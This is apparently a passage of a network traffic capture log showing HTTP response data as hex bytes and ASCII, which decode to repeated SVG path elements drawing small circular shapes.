                                                                                                                                                                              2023-09-15 05:28:20 UTC7587INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                              Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                              2023-09-15 05:28:20 UTC7603INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                              Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                              2023-09-15 05:28:20 UTC7619INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                              Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                              2023-09-15 05:28:20 UTC7635INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                              Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                              2023-09-15 05:28:20 UTC7651INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                              Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                              2023-09-15 05:28:20 UTC7667INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                              Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                              2023-09-15 05:28:20 UTC7683INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                              Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                              2023-09-15 05:28:20 UTC7699INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                              Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                              2023-09-15 05:28:20 UTC7715INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                              Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                              2023-09-15 05:28:20 UTC7731INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                              Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                              2023-09-15 05:28:20 UTC7747INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                              Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                              2023-09-15 05:28:20 UTC7763INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                              Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                              2023-09-15 05:28:20 UTC7779INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                              Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                              2023-09-15 05:28:20 UTC7795INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                              Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                              2023-09-15 05:28:20 UTC7811INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                              Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                              2023-09-15 05:28:20 UTC7827INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                              Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                              2023-09-15 05:28:20 UTC7843INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                              Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
